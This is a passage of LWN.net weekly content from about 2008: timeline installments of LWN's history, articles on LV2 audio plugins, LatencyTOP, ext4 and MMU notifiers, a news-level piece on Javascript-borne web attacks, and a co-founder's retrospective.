     earnings.  Sony releases Linux for the Playstation 2 console.

 May 10, 2001: 
     EBIZ cancels its acquisition of Linux NetworX.  The Bergen Linux Users
     Group implements RFC 1149.

 May 17, 2001: Eazel shuts
     down.  Enhanced Software Technologies - owned by Atipa - shuts down.

 May 24, 2001: MandrakeSoft
     lays off 20% of its employees, including its CEO.


Your editor has said previously that Eazel's plan never seemed (to him) to make
sense; the investors finally came to the same conclusion and pulled the plug.  Another
plan which did not make sense was what had happened to MandrakeSoft:
outside managers placed in the company by its venture capitalists had
decide that Mandrake should be an e-learning company - not exactly its area
of core expertise.  That strategy just about destroyed MandrakeSoft before
the decision to go back to its distributor roots was made.  The company 
has taken many years to recover from that mistake.


 June 21, 2001:
     Red Hat turns a profit.  GCC 3.0 is released.


 June 28, 2001: Caldera
     announces plans to move its distribution to per-seat licensing.  Linus
     announces that the 2.5 development series will open "in a week or
     two."  Meanwhile memory management problems continue to plague the 2.4
     kernel (now at 2.4.5).  VA Linux leaves the hardware
     business.  MandrakeSoft announces plans for an IPO.  LynuxWorks
     withdraws its IPO application. 


In these difficult days, the fact that Red Hat could produce a profit -
even a tiny one - offered a ray of hope.  The failure of VA Linux to make
it in the hardware business was a sobering counterexample, though, given
that VA was once the most prominent company selling Linux-installed systems.


 July 4, 2001: Version 1.0
     of the Linux Standard Base is released.

 July 12, 2001: The Mono
     project is launched.  Atipa shuts down.

 July 19, 2001: MySQL and
     NuSphere end up alleging GPL violations (and more) in court.  Dmitry
     Sklyarov is arrested on DMCA charges in Las Vegas.  EBIZ warns
     stockholders that more money must be found or the company will not be
     viable. 


More than anything else, the arrest of Dmitry was a wakeup call for the
community.  It seemed that, in the U.S., any developer could be arrested
for interfering with the business plans of large companies.  As a result of
this action, some developers still refuse to travel to the U.S.


 August 2, 2001:
     MandrakeSoft completes its IPO, raising €4.2 million.

 August 16, 2001: LWN
     co-founder and editor Liz Coolbaugh leaves
     LWN. 


We still miss Liz - but she remains a good friend.


 August 30, 2001: Dmitry
     Sklyarov is charged with conspiracy and faces 25 years in prison.  VA
     Linux takes the SourceForge software proprietary.

 September 6, 2001: IBM and
     others put millions of dollars into SUSE to keep it from bankruptcy.
     Sistina takes its Global Filesystem (GFS) proprietary.

 September 13, 2001:
     Caldera turns in horrific quarterly earnings; layoffs and a
     reverse stock split follow.  Lineo lays off a large
     portion of its staff.  Great Bridge, a company seeking to
     commercialize PostgreSQL, shuts down entirely.  EBIZ goes into chapter
     11 bankruptcy.

 September 27, 2001: The
     2.4.10 kernel is released.


Few people remember September, 2001, as one of their favorite months.
Beyond the terrible events occurring in the wider world, the problems in
the commercial Linux sector just seemed to get steadily worse.

The 2.4.10 kernel release is an important point as well.  Here is where the
longstanding memory-management problems came to a crux; Linus responded
by ripping out the 2.4.9 VM code and replacing it with a completely
different implementation.  What followed may be the closest we ever came to
a fork in the Linux development process.  Some distributors stayed with
2.4.9 for a long time - RHEL 2 systems (still supported by Red Hat)
are still running a kernel which, at least, claims to be 2.4.9.  The worst
passed, however, and this is the point at which 2.4 started toward
something resembling stability.


 October 4, 2001: The World
     Wide Web Consortium proposes allowing patented technology with
     proprietary licensing into web standards.  SUSE brings in another
     round of funding and announces the layoff of 120 people. 

 October 11, 2001: Michael
     Hammel leaves LWN.


Tucows, which had not been helped by having launched a major new offering
on September 11, laid off a number of people, including Michael.  His
desktop columns had been a welcome addition to LWN, and his departure was a
big loss.


 October 18, 2001: Progeny
     stops development of its Debian-based distribution.

 October 25, 2001: Lindows
     announces its existence.  

 November 8, 2001: Linus
     announces that 2.5 will start soon.  Marcelo Tosatti is named as the
     2.4 maintainer.  IBM open-sources Eclipse.  The European software
     patent directive picks up steam.

 November 29, 2001: The 2.5
     kernel development series starts - with a filesystem corruption bug.

 December 6, 2001: The
     Mandrake Club is launched as a fund-raising initiative.


Initially the Mandrake Club was meant to function as a sort of tip jar.  As
financial problems at MandrakeSoft got worse, though, it became the
storefront through which the Mandrake distribution was sold.  Not everybody
liked how the Club was run, but it doubtless helped MandrakeSoft to survive
into the present.


 December 20, 2001: Charges
     against Dmitry Sklyarov are "deferred" and he returns home to Russia.

 January 17, 2002: DeCSS
     creator Jon Johansen is indicted in Norway.  

 January 31, 2002: LWN is
     unacquired.  2.5 kernel patches get dropped, leading to another "Linus
     does not scale" discussion.


The indictment of Mr. Johansen made it clear that DMCA-like problems were
not limited to the USA.

Meanwhile, by this time, Tucows had come to terms with the fact that its
acquisition (and ongoing operation) of LWN was not helping it, given the
directions its business was taking.  So, after some discussion, LWN was
unacquired - it was given back to its creators, with Tucows holding on to a
small piece just in case.  The parting was on the best of terms; it
revalidated our decision to go with Tucows in the first place.  But, after
almost two years, it was time for LWN to venture back out into a scary
world as an independent business.
That was the beginning of a new phase, with its
own ups and downs, which will be discussed in the next installment.

		The LV2 Audio Plugin Standard


LADSPA, Richard Furse's
Linux Audio Developer's Simple Plugin API, provides a plug-in
framework for software audio effects.  LADSPA applications are
divided into two categories, host applications and plugins.
From the LADSPA site:


LADSPA is a standard that allows software audio processors and effects to be plugged into a wide range of audio synthesis and recording packages.
For instance, it allows a developer to write a reverb program and bundle it into a LADSPA "plugin library." Ordinary users can then use this reverb within any LADSPA-friendly audio application. Most major audio applications on Linux support LADSPA.


Recently, the
LV2 Audio Plugin Standard
was announced
by Dave Robillard, the aim of LV2 is to replace LADSPA:


LV2 is a standard for plugins and matching host applications, mainly targeted at audio processing and generation.
LV2 is a simple but extensible successor of LADSPA.
intended to address the limitations of LADSPA which many applications
have outgrown.
While LADSPA has been quite successful with many plugins and hosts, it is quite limited and can't be extended without breaking existing implementations. LV2 in contrast is designed with extensibility in mind right from start.

<!-- img src="/images/ns/lv2logo.png" width=494 height=75
 alt="[LV2 Logo]" align="right" border=0 hspace=3 -->

One of the LADSPA limitations comes from the use of fixed data fields
in the plugin binaries.  LV2 defines its plugin data by using the

Resource Description Framework (RDF) standard.
This allows for a much wider variety of plugin data definitions.
The RDF files also allow for the inclusion of multiple string
definitions, which allows for plugin internationalization.
The core LV2 code is intentionally designed to be small and generic,
while allowing for support of independently designed extensions.


Plugin identification has been changed from an ID number to a URI,
this allows for extended capabilities such as the reference or fetching
of plugins across the network.
While LADSPA only used floating point numbers for port connections, LV2
supports port type extensions.  This can be used to handle

MIDI, OSC
(OpenSound Control), frequency domain and other types of data.
LV2 bundles of all of the data for each plugin into a single directory
for easy access. As with ALSA, the actual lv2 core specification
is relatively simple, the
lv2core-1.tar.gz
source file consists of a C header file, some build files and
documentation.


Several software packages were released at the same time as the
LV2 standard announcement.
SLV2 0.4.2 is a C library
that is used to access the LV2 plugins:
"Unlike LADSPA, LV2 is (more or less) designed with the assumption that
hosts will use a library to discover/load/use plugins.  SLV2 is one such
library, which does the Right Thing with as little burden on host
authors as possible."
The 
lv2dynparam extension and helper was also announced:
"The extension consists of a header describing the extension interface
and libraries, one for plugins and one for hosts, to expose
functionality in more usable, from programmer point of view, interface."


Three LV2 compatible plugins were also announced by author Nedko Arnaudov, these include the
lv2vocoder version 1,

Simple Sine Generator 20080109 and
zynadd plugin version 1.
Arnaudov also released
zynjacku version 1,
a JACK based GTK2 host for LV2 synthesizers.
The success of LV2 will revolve around its adoption by one or more of the
major LADSPA applications, as well as the conversion of more LADSPA
plugins.  Conceptually, LV2 seems like a step forward for the Linux audio
plugin architecture.


		Finding system latency with LatencyTOP


Stuttering audio or an unresponsive desktop – typically caused by
operating system latency – are two things that annoy
users.  They can be difficult problems to diagnose, though, as they are
transient 
and buried deep inside the kernel.  A new tool, LatencyTOP, seeks to provide more
information on where latency is occurring so that it can be fixed or avoided.


Latency is the measure of how much time elapses between when an action is
initiated and when its effects become visible.  If a user clicks the mouse
button in an application, the latency is the amount of time between that
click and when the associated action begins.  There are lots of different
reasons for 
latency, some of which are outside of Linux's control; being able
to measure what latency the OS is contributing will be very useful.
LatencyTOP is reporting on a specific subset of latency causes, as described
in the announcement:


There are many types and causes of latency, and LatencyTOP [focuses on the]
type 
that causes audio skipping and desktop stutters. Specifically, LatencyTOP 
focuses on the cases where the applications want to run and execute useful 
code, but there's some resource that's not currently available (and the 
kernel then blocks the process). This is done both on a system level and 
on a per process level, so that you can see what's happening to the system, 
and which process is suffering and/or causing the delays.


LatencyTOP measures the average and maximum amount of latency in various
operations by inserting annotation calls in the kernel.  An example from
the announcement is instructive:

The scheduler accumulates any time spent sleeping, between the
set_latency_reason() and restore_latency_reason() calls,
charging it to the "sync system call".  Any lower level calls to set the
latency reason will be ignored in this code path – they may be useful
in other code paths – as it is the highest level active reason that
gets charged.


The current interface for annotating is likely to change, though the
semantics will stay the same.  Comments on the
original submission suggested using the kernel markers feature that was
merged for 2.6.24.  LatencyTOP developer Arjan van de Ven seems amenable to
that; reusing a kernel interface, rather than adding a new one, is
generally the right choice.  There is other work to do as well, the patch
was submitted for other kernel hackers to test and comment on, not to be
merged into the mainline.


LatencyTOP comes with a userspace application, shown at right, that
displays the information gathered.  It reads from the
/proc/latency_stats file that is created by the LatencyTOP infrastructure patch
– so long as you enable CONFIG_LATENCYTOP in the kernel.  It displays
the nine – an off-by-one in the code as it would seem that ten
were intended – largest latencies over the past 30 seconds in the upper pane.


A list of process names runs along the bottom of the display, which can be
selected with the arrow keys. The latency sources for
that process will then be shown in the lower pane.  The example at left
shows the tool with the
firefox process selected.  As can be seen, there are still lots of areas
that need annotations – "Unknown reason" along with the wait channel are
displayed when the reason has not been set.  When narrowing a problem down,
it should be straightforward for a kernel hacker to add annotations to the
appropriate locations.

 LatencyTOP, like its sibling PowerTOP –
also developed by van de Ven at the Intel Open Source Technology Center
– is a powerful tool for trying to track down system problems.  It
will probably undergo some changes along the way: the userspace
application is still rather rudimentary and the kernel data collection
needs finer-grained locking.  But, before too long, a mainstream tool
to measure system latency based on this work should appear.  

		A better ext4


Last week's Kernel Page may
have been filesystem-heavy, but there was still a big omission, in the form
of ext4.  But ext4, being the successor to ext3, may well be the filesystem
many of us are using a few years from now.  Things have been relatively
quiet on that front - at least, outside of the relevant mailing lists - but
the ext4 developers have not been idle.  Some of their work has now come to
the surface with Ted Ts'o's posting of the ext4 merge plans for 2.6.25.


One of the changes going into ext4 is a lifting of the longstanding 4KB
block size limit.  That does not mean that just any block size works, though,
and this feature will benefit fewer people than one might think, for one
specific reason: the block size must still be no larger than the page size
on the host system.  So those of us running x86 systems with 4KB pages will
be stuck with 4KB blocks still.  And, on any system, the maximum block size
is now 64KB.


One amusing effect of this change is that the size of a directory entry can
now be as large as 64KB as well.  But the field which holds the size of
directory entries is only 16 bits wide.  So a special hack has been
employed to recognize 64KB directory entries and keep everything
consistent.


Some internal variables have overflow problems as well.  Block numbers are
stored as a signed, 32-bit quantity, and so are block group numbers.  That
limits the maximum size of a filesystem to a mere 256PB.  In 2.6.25, these values will
become unsigned long variables, eliminating that intolerably low limit.
Through some trickery, the inode field which stores the number of blocks
associated with a file will be expanded to 48 bits, raising the
maximum size of an individual file to just under 248 512-byte
blocks.  


The work does not stop there, though: another patch redefines that field
to mean the number of filesystem blocks (instead of 512-byte sectors) used
by the file.  This is a change which has to be handled carefully, since it
is an on-disk format change which could create trouble for people with
existing ext4 filesystems.  Everybody who is using ext4 should certainly be
doing so with the knowledge that it's a development filesystem and is only
suitable for storing files which are not valuable for more than about
30 minutes - Rawhide OpenOffice.org updates, say.  But it still would be
nice to not trash every existing ext4 filesystem out there.  So the
i_blocks field will continue, by default, to hold the number of
512-byte blocks.  But, if that field exceeds 32 bits and forces the use of
48-bit numbers, it is thereafter interpreted as filesystem blocks.  Since
no existing filesystems are yet using 48-bit numbers, this approach
successfully avoids breaking them.


Journal checksums are another feature arriving for 2.6.25.  If the system
crashes, the journal is used to recover any transactions which were
committed, but which did not actually make it to disk.  It sure would
be nice to know that the journal, as stored in the filesystem, is intact
before using it to make changes elsewhere.
The checksum enables the filesystem to ensure that the journal is good and
avoid (further) corrupting the filesystem if it is not.  An interesting
side benefit is that the checksum loosens the constraints on how the
journal is written to disk, since an incompletely-written journal will now
be detected; that should help to improve filesystem performance slightly.


Note that full data checksumming is still not on the agenda for ext4.  But
checksumming the journal is a good (if small) step in the right direction.


Another change is a VFS API change, in that it turns the i_version
field of the inode structure into an unsigned, 64-bit value on all
architectures.  This version number is incremented when the file is
changed, and it's stored (split into two fields) in the on-disk inode.
64-bit version numbers are required by NFSv4, which uses them to provide
the dreaded "stale file handle" error when things change.


There is a new ioctl() (EXT4_IOC_MIGRATE) which can be
used to explicitly request that the on-disk inode for a file be converted
to the ext4 format.


The ext4 filesystem is extent-based, and has been for some time.
"Extent-based" means that it tracks block allocations by extents (first
block, number of blocks) rather than storing pointers to each individual
block, as is done in ext3.  There are a number of performance benefits to
doing things this way, especially for larger files.  Those benefits
disappear, though, if a file's blocks cannot be grouped into the smallest
number of extents possible.  


One technique which greatly helps in optimizing block allocations for files
is to allocate them in relatively large groups, rather than individually.
In 2.6.25, ext4 will contain the multi-block allocator, which does exactly
that.  One might think that allocating a few blocks at a time would not be
that big of a change, but the multi-block allocator is by far the most
complex patch in the set.  A lot of effort and heuristics go into deciding
how many blocks to allocate, finding the optimal set of blocks, tracking
the allocation, recovering blocks which end up never being used, ensuring
that an application cannot read pre-allocated (but unwritten) blocks in
search of leaked secrets, etc.  It is quite a bit of code, but it is worth
the trouble; multi-block allocation will be enabled by default in 2.6.25.


As noted above, a number of these patches force changes to the on-disk data
structure.  According to Ted, though, these should be the last on-disk
changes for ext4.  There are some features which still will not have been
merged when 2.6.25 comes around - delayed allocation and online
defragmentation among them - but they should not require format changes.
So ext4 is getting closer to the point where it is considered ready for
production use.


It is not at that point yet, though, and people who use it are still
doing so at their own risk.  To help drive that point home, Ted has
proposed a new mount flag
(called test_fs) which communicates to the kernel the user's
understanding that they are about to mount a developmental filesystem and
will not go filing lawsuits if things go wrong.  In the absence of this
mount option, an ext4 filesystem will refuse to mount.  One might think
that child-proofing the filesystem in this way would not be necessary, but
some extra care in this area can only be a good thing.  Filesystem-related
surprises are rarely welcome.

		Web security vulnerabilities and Javascript


Various recent, unrelated security issues seem to have a common thread:
Javascript.  It is not the fault of the language, exactly, nor of any
particular implementation.  It is the fundamental nature of how the
language is used that often causes it to be "front and center" when security
problems are found on the web.


Imagine that your computer reaches out across the net, to an unverified
site, over an unencrypted link and grabs code that it executes with little
in the way of further inspection.  When put that way, it sounds rather
dangerous, but that is exactly what browsers do with Javascript code.
There are limits to what Javascript is allowed to do—meant to thwart
malicious uses—but it has to have some privileges on the local
machine in order to be useful.

 One of the recent outbreaks is the "random js" attack, which propagates
through Javascript served by legitimate websites.  It generates a random
.js filename for each visitor—which is where the name comes
from—inserting a reference to it in a page on the site.  It also
stores the IP address of the visitor so that it does not repeat the
infection multiple times.  The payload then tries to exploit a dozen or more
Windows vulnerabilities to install malware of various sorts.

The payload is not a problem for Linux users, but the websites hosting the
attack are running Apache, many on Linux.  The big unresolved question is
how the servers were infected.  It could be as simple as getting root
access via insecure or intercepted root passwords.  Or there could be some,
as yet unknown, exploit.  That certainly bears watching.


Because of the privileges that Javascript has on a local host, it can be
used to spread malware, by exploiting the trust that
users—those that even concern themselves with such things—have
in the website they are visiting.  It can also play a role in redirecting
traffic away from a trusted site, even though the site itself has not been
compromised.  

 A post
by Nat Torkington at O'Reilly illustrates a common problem that content
providers need to worry about.  O'Reilly's perl.com site carried
advertising that required them to load Javascript from the advertiser's
site.  All was well until the domain expired. A porn site bought it and
started providing the required Javascript file with new contents
redirecting the users to their site.  

A man-in-the-middle or DNS cache poisoning attack could be used for similar
results on a smaller scale basis.  One can certainly see how it might be
used by phishers as well.  It is a difficult problem, as website owners need
to be able to call out to advertisers' Javascript, but users typically do
not expect to run code from a site they did not directly access.


A theoretical attack on home routers has started to show up in the
wild.  It uses Javascript to exploit a vulnerability in home routers to
change the DNS entries for a popular Mexican bank.  After that, accesses to
the bank would instead go to the malicious website which would collect
usernames and passwords, allowing the attacker to access the accounts.
Once again, users probably do not expect that surfing to a random site
could suddenly expose them to bank account compromise.

 There are some things that can be done.  For users, if Javascript
cannot be disabled entirely—something increasingly difficult in the
"Web 2.0" world—it can at least be leashed using NoScript for Firefox.  

For website owners, Google's Caja project, seeks to
define a subset of Javascript which implements an object-capability
language, which would make it easier to sandbox remote code.  If this
effort succeeds, one can imagine that users could restrict their browsers
to only use the Caja subset some day as well.


		A Code of Conduct


The openSUSE project board has proposed a code
conduct for mailing lists and IRC.  This would be in addition to the
existing Guiding
Principles, mailing list
netiquette guide and IRC
rules.

There seems to be a trend among open source projects to adopt a code of
conduct.  As the number of people participating on mailing lists and IRC
channels increases, so does the level of poorly stated questions, off-topic
chatter and other annoyances.  As levels of frustration increase so does
the potential for rudeness.  Whether a poster intends to be rude, or is
only perceived to be rude makes little difference.  The international
nature of this communication almost ensures there will be some
misunderstandings based on culture and language.

So do codes of conduct really work?  They can, but often they do not.  If
the code is not enforced then there is no incentive for anyone to read the
code, much less follow it.  If the code is too actively enforced it will
stifle communication.  Somewhere in between there must be a happy medium.
Finding it can be a challenge for even the most diplomatic of enforcers.

There are no quick fixes for the problems that come with active channels of
communication.  There are many documents throughout the web that urge
people to be polite and helpful, how to ask better questions and how to
provide better answers.  LWN readers may be more aware of them than the
average netizen.  It is up to the aware to educate the unaware in as kind
and gentle a manner as possible.

		Memory management notifiers


Virtualized guests running under Linux like to think that they are doing
their own memory management.  The truth of the matter, though, is that the
host system cannot allow guests to directly modify the page tables used by
the hardware; allowing that sort of access would compromise the security of
the host.  So, somehow, the host must be involved in the guest's memory
management.  One common technique is through the use of shadow page
tables.  Guest systems maintain their own page tables, but they are not the
tables used by the memory management unit.  Instead, whenever the guest
makes a change to its tables, the host system intercepts the operation,
checks it for validity, then mirrors the change in the real page tables,
which "shadow" those maintained by the guest.


One problem with this technique, as implemented in Linux currently, is that
there is no easy way for the host to feed page table changes back to the
guest.  In particular, if the host system decides that it wants to push a
given page out to swap, it can't tell the guest that the page is no longer
resident.  So virtualization mechanisms like KVM avoid the problem
altogether by  pinning pages in memory
when they are mapped in shadow page tables.  That solves the problem, but
it makes it impossible to swap processes running KVM-based virtual machines out of main
memory.


This seems like a good thing to fix.  And a fix exists, in the form of the
MMU notifiers patch posted by
Andrea Arcangeli (from his shiny new Qumranet address).  This patch allows
an interested subsystem to be notified whenever specific memory management
events take place.  The process starts by setting up a set of callbacks:


These callbacks are bundled into an mmu_notifier structure:


The interested code then registers its notifier with:


Here, mm is the mm_struct structure associated with a
given address space.  It is not expected that anybody will be interested in
all memory management events, so notifiers are associated with
specific address spaces.  Once the notifier is in place, the callbacks will
be invoked when interesting things happen:


 release() is called when the relevant mm_struct 
     is about to go away.  So it will be the last callback made to that
     notifier.

 age_page() indicates that the memory management subsystem
     wants to clear the "referenced" flag on the page associated with the
     given address.  This callback should return the previous
     value of the referenced bit, or the closest approximation available on
     the host architecture.

 invalidate_page() and invalidate_range() are both
     ways of telling the guest that the given address(es) are no longer
     valid - the page has been reclaimed.  Upon return from this callback,
     the affected address range should not be referenced by the guest.


For the curious, the KVM patches
(showing how these notifiers are used there) have also been posted.

While this patch set is aimed at KVM, there has been some interest from
other directions as well - virtual machines are not the only places where
separate (but related) page tables are maintained.  Graphical processing
units on contemporary video cards are an example - they have their own
memory management units and have some interesting management issues of their own.
Remote DMA (RDMA) engines are another possible user.  So these patches have
attracted comments from a few potential users, and have changed
significantly since their first posting.  The discussion is still ongoing,
so further changes may come about before the notifiers find their way into
the mainline.

		Ten-year timeline part 4: the end and the beginning


When your editor started this series, the idea was to have four
installments covering the ten-year life (so far) of LWN.  Well, this is the
fourth installment, and it gets less than halfway there.  This is not, it
seems, a topic which inspires brevity.  So this series will continue past
the anniversary, though your editor anticipates picking up the pace a bit
for the second five years.  There is less to be learned, arguably, by
looking at events in the relatively recent past.


Anyway, at the end of the third installment, LWN had been unacquired
by Tucows and was, once again, on its own.  The worst of the dotcom bust
may have passed, but it was still a somewhat scary environment in which to
be attempting to restart a business.  It was, in fact, even scarier than we
had thought when we so naively set out to show that we could do a better job
of bringing in the cash than Tucows did.


 February 7, 2002: Linus
     tries BitKeeper at last.

 February 14, 2002: Sun
     states that it will "ship a full implementation of the Linux operating
     system."  Dave Whitinger joins LWN.net.


Dave Whitinger was, of course, one of the founders of LinuxToday.  He
joined LWN with the intent of helping us develop the advertising side of
the business.  That did not work out as intended, but it is hardly Dave's
fault; it was a terrible time to be trying to sell advertising.


 February 28, 2002: Sun
     cuts off free access to StarOffice, but we had OpenOffice.org by then
     and didn't mind.  BitKeeper starts to settle in as the kernel's source
     management system.


Linus stuck with BitKeeper after his initial trial, setting a number of
things in motion.  For the next few years, the use of proprietary software
at the core of the kernel development process would be a constant source of
unhappiness and worry - and, in fact, the story had just the sort of
unhappy ending that some observers had feared.  But this was also the move
which rationalized the kernel work flow and made the whole system scale;
the incredible rate of change we see now would not have been possible
without it.  The use of BitKeeper also made the community aware of what
distributed source control could do and, eventually, inspired the creation
of a number of free programs with the same essential features.  One could
say that the community would have eventually developed these systems on its
own without the push from Larry McVoy and BitKeeper, and that's probably
true.  But the fact is: we didn't do it at that time, so we had no real
alternative to BitKeeper.


 March 7, 2002: Martin
     Dalecki's "IDE cleanup" patches start to raise concerns among kernel
     developers, who have this strange notion that their disks should
     actually work.  A petition against the use of BitKeeper circulates on
     the net.  Eric Raymond goes around telling the world that the kernel
     development process is "in crisis."

 March 14, 2002: Richard
     Stallman claims that the GNU HURD will be ready by the end of the
     year.  MandrakeSoft pleads for donations to keep the business alive -
     and LWN does too.  Martin Dalecki officially takes over IDE
     maintenance - and breaks more systems.


We got about $5,000 from our initial plea for donations.  It was a real act
of generosity on the part of our readers, but one does not keep a business
with five employees going for very long with that sort of money.


 March 28, 2002: The
    proposed "consumer broadband and digital television promotion act"
    would require DRM technology in all software which touches digital
    media.  Lineo lays off more staff.

 April 25, 2002: More
    BitKeeper flames.  Lineo goes through a "recapitalization" effort to be
    able to do things like pay its employees.

 May 2, 2002:
    OpenOffice.org 1.0 is released.

 June 6, 2002: LWN switches
    to the "new" site code.  Red Hat applies for a few software patents.
    ADEOS, a real-time system which avoids the RTLinux patent, is
    released.  UnitedLinux launches.  Mozilla 1.0 is released.


It is amazing how many readers hated the new code.  Certainly there were a
lot of silly things in the initial version of the site; we fixed a number
of them in a hurry.  Many readers disliked the ability to post comments -
often posting comments to that effect.  The addition of comments was
something we thought about carefully for a long time; we were quite
concerned that they could ruin the feel of the site.  In the end, it seems,
trusting our readers has paid off; the quality of the conversation here is
often quite good.  

UnitedLinux was a cooperative effort between Caldera, Conectiva,
SuSE, and Turbolinux; the idea was to join together to create a common
base from which each could then craft a separate product.  The effort was
never all that successful, and the presence of Caldera would, of course,
doom it outright in the end.  But it was a big deal at the time.  It is
interesting to see that Mandriva (despite MandrakeSoft's refusal to join
UnitedLinux) and Turbolinux are now attempting a very similar
sort of arrangement.


 June 13, 2002: Secure
    Computing Corporation claims patents on SELinux.  

 June 27, 2002: The 2002
    kernel summit sets October 31 as the date for the 2.6 feature
    freeze.  GNOME 2.0 is released.

 July 4, 2002: Darl McBride
    takes over at SCO.

 July 25, 2002: LWN
     announces "the end of the road."  The "IDE cleanup" patch series (up
     to number 100) causes system lockups and file corruption.  Debian
     GNU/Linux 3.0 ("woody") is released.  Version 1.0 of the Ogg Vorbis
     codec is released.


By the end of July, we had come to realize that the advertising business
was not going to work out for LWN, and we were short of other ideas.  The
bank account had reached a point where we could not pay even very small
expenses. So we
concluded that it was time to throw in the towel and try something else -
though we had no clue of what "something else" might be.  It was with a
heavy heart that we announced our plan to shut down the site.

What happened next is that our donation box, which had sat mostly empty
after the initial announcement, was suddenly topped up to the tune of about
$35,000.  Many of the donations came with notes to the effect of "use this
to throw a big party."  This, shall we say, got our attention.  We decided
that, just maybe, the subscription idea was worth a try after all, and
decided to make a go of it.  It was not the end after all.


 August 1, 2002: A new
     beginning.  HP tries to use the DMCA to shut down disclosure of
     security holes.

 August 15, 2002:
     Distributions from MandrakeSoft, Red Hat, and SuSE are certified to be
     compliant with the Linux Standard Base.


This was when our credit card merchant bank at the time decided that all
those donations might just be fraudulent.  So they seized the money back out
of our bank account.  That, too, got our attention.  It took a few months
and some lawyer time to get the money you all had sent in our direction;
during that time, it was money from PayPal (the subject of everybody else's
horror stories) that kept the lights on while our main source of cash was
blocked.

Needless to say, we got a new merchant bank, which we still use to this
day.  The new bank exhibits a rather higher clue level than the old one
did, but we also learned a valuable lesson: don't mess with the credit card
money pipeline.  Every now and then, somebody asks why we don't accept
pure donations; this is why.  


 August 22, 2002: Martin
     Dalecki quits and the entire series of 115 "IDE cleanup" patches is
     deleted from the 2.5 kernel.

 August 29, 2002: British
     Telecom's attempt to patent the web dies in court.  The BitKeeper
     license changes.  Caldera becomes the SCO Group.

 September 12, 2002: Some
     patches get dropped after Linus starts running his mail through a spam
     filter. 


It's hard to believe that, only 5+ years ago, somebody with an email
address as well distributed as Linus's could get by without spam
filtering.  There are a lot of free "productivity" applications, but,
arguably, few have actually increased productivity to the extent that
SpamAssassin has.


 September 26, 2002: The
     first development 
     release of the "Phoenix" browser is announced.  UnitedLinux upsets the
     community by releasing a closed beta.


Phoenix was the Mozilla Foundation's answer to (relatively) lightweight
browsers like Galeon, which had managed to turn the Gecko engine into
something which was truly usable.  The Phoenix browser proved popular, and
eventually became the tool now known as Firefox.


 October 3, 2002: The
     first subscriber-only weekly edition.  Eldred v. Ashcroft is argued in
     the U.S. Supreme Court.


Eldred v. Ashcroft, argued by Lawrence Lessig, was an attempt to roll back
copyright extension in the US; it eventually was unsuccessful.  To this
day, there still has not really been a successful challenge to the
extensions to copyright passed over the last few decades - though some
especially nasty attempts to make things even worse were defeated.

With the October 3, 2002 edition, LWN adopted the new policy of requiring
subscriptions in order to read our original content prior to the
publication of the weekly edition.
That policy has stayed essentially unchanged since
then, despite the occasional temptation to increase the subscriber-only
period.  Subscription rates have also stayed unchanged, even though raising
them is also tempting.


Subscriptions have certainly been successful, in that they have kept the
operation going in the years since then.  And there is a real joy
associated with being truly answerable to our readers instead of
advertisers.  Nonetheless, it is a challenging business; people do not like
to pay to read web-based content.  The fact that so many of our readers
are willing to do so is most gratifying.  Trends in other parts of
the net are moving away from this approach, though, with formerly
subscription sites moving to pure advertising models.  So it will be
interesting to see how it all plays out in the future.


Meanwhile, next week's installment will look at how things went for Linux
(and LWN) starting toward the end of 2002.  Stay tuned.

		A ten-year retrospective from LWN's other co-founder


Hello to all LWN readers!  For the tenth anniversary of LWN,
I've been dragged out of my closet to say a few words.  Am I
stunned that LWN is still going after 10 years?  Not really.
Much more stunning to me is the realization that the number
of years LWN has been published without me are now almost double the number
of years it was published with me.  That is much harder to get over.
As a result, all new readers from 2002 on have no reason to
know who I am or what I've written in the past.  For those of
you that remember me and have asked about me, thank you and rest assured 
that I haven't forgotten you either.  

My name is Elizabeth Coolbaugh (Liz) and I was there for the very
first issue as well as many issues that
followed in 1998 through 2001.  I've always said it was the very best
job I ever had.  I wish for all of you, if you haven't experienced it
yet, a job where your first weeks of work are greeted with happy,
enthusiastic letters.  As the years went by, letters of praise, though
much sparser, never totally ceased.  You couldn't have a better
incentive to work harder and harder!

Jon has done an excellent job of going over the history of the first
few years already, so all I can add is some tidbits or personal viewpoints.
I'll mention that for me, the start of LWN was actually back in
the early 1980's, when Jon, Becky and I came together as a programming
team in the then infamous "Assembly Language Programming" class offered
through the Engineering School at CU Boulder.  We got a chance to
experience lots of late nights, interesting hardware experiences
and how to keep going with pizza, chocolate, caffeine, etc.  That is
a good way to get to know your future business partners.  Jon and Becky
never let me down and we all found different strengths to add to the mix.
Forrest was around, too, though not working with us directly at the time.

Jon mentioned that I was between jobs at the time we began.  In fact,
I had left NCAR three months pregnant.  I loved working at NCAR for
many, many years, but I had always said that I would leave it when the
work stopped being fun.  It actually stopped being fun about two years
before that, but I had weathered rough times before and waited to make
sure the situation wasn't going to turn-around before choosing to move
on.  The challenge of a new baby on the way (and the continuing challenge
of the Multiple Sclerosis that eventually led to my departure from LWN)
finally made it "the right time".

So I'd actually had most of a year off to recuperate, re-organize,
have a baby and test the job market waters.  What I wanted was a job
that used my professional skills and yet was part-time, to help me
keep the health I'd regained.  What a pipe-dream!  Companies that


would have gladly recruited me full-time just tossed my resume into
the nearest recycle bin.  The nicer ones told me to go out and find
someone else with identical skills who wanted to job-share a full-time
job and they would be willing to consider the possibility.  Not 
bloody likely.

So when Jon and I were having lunch and he suggested we might be
able to work together to create something giving me what I wanted
and allowing him to eventually leave NCAR, it seemed to be the
right idea at the right time.  I never regretted the decision, but
in fact, I had a full-time working spouse to cushion the decision.
Brandon's reaction (my husband) to becoming the sole support of the
family and a new father in one fell swoop was a little different
-- much like a deer full-blinded by headlights.

In the spirit of true confessions, though I had fifteen years experience
in the computing field and had worked with many different operating
systems, VMS and Solaris being primary, I'd never actually touched a
Linux system.  Jon's unwavering belief in my ability to pick it all
up in a heartbeat was both daunting and encouraging at the same time.
So I installed my first Linux system only three or four months before
we first started publishing.  It did give me a fresh, unbiased view
of the whole community, though.  Okay, not totally unbiased.  I did
sit on the emacs side of the whole emacs/vi war.

To get started, I subscribed to say, a hundred different newsgroups
and mailing lists full of people I'd never met, topics I'd never heard
of and flame wars I didn't care to read.  It was truly a new skill to
develop to learn to skim through them searching for the topics people
cared about, the posts that actually carried real information and gently
lift each little kernel of "news" out and place in into the newsletter,
then wait to hear how well I'd done.

The response was totally overwhelming.  I will never, ever forget
the emails we received those first couple of months.  New people were
finding us each week and so the responses kept coming in.  They drove
me to try and make my contributions worthy of the praise they sent.
It is because of those emails that I'm not surprised LWN is still out
there today.  People wanted and needed what we had to offer.  Jon's
vision of what people liked and wanted has always been clear and that
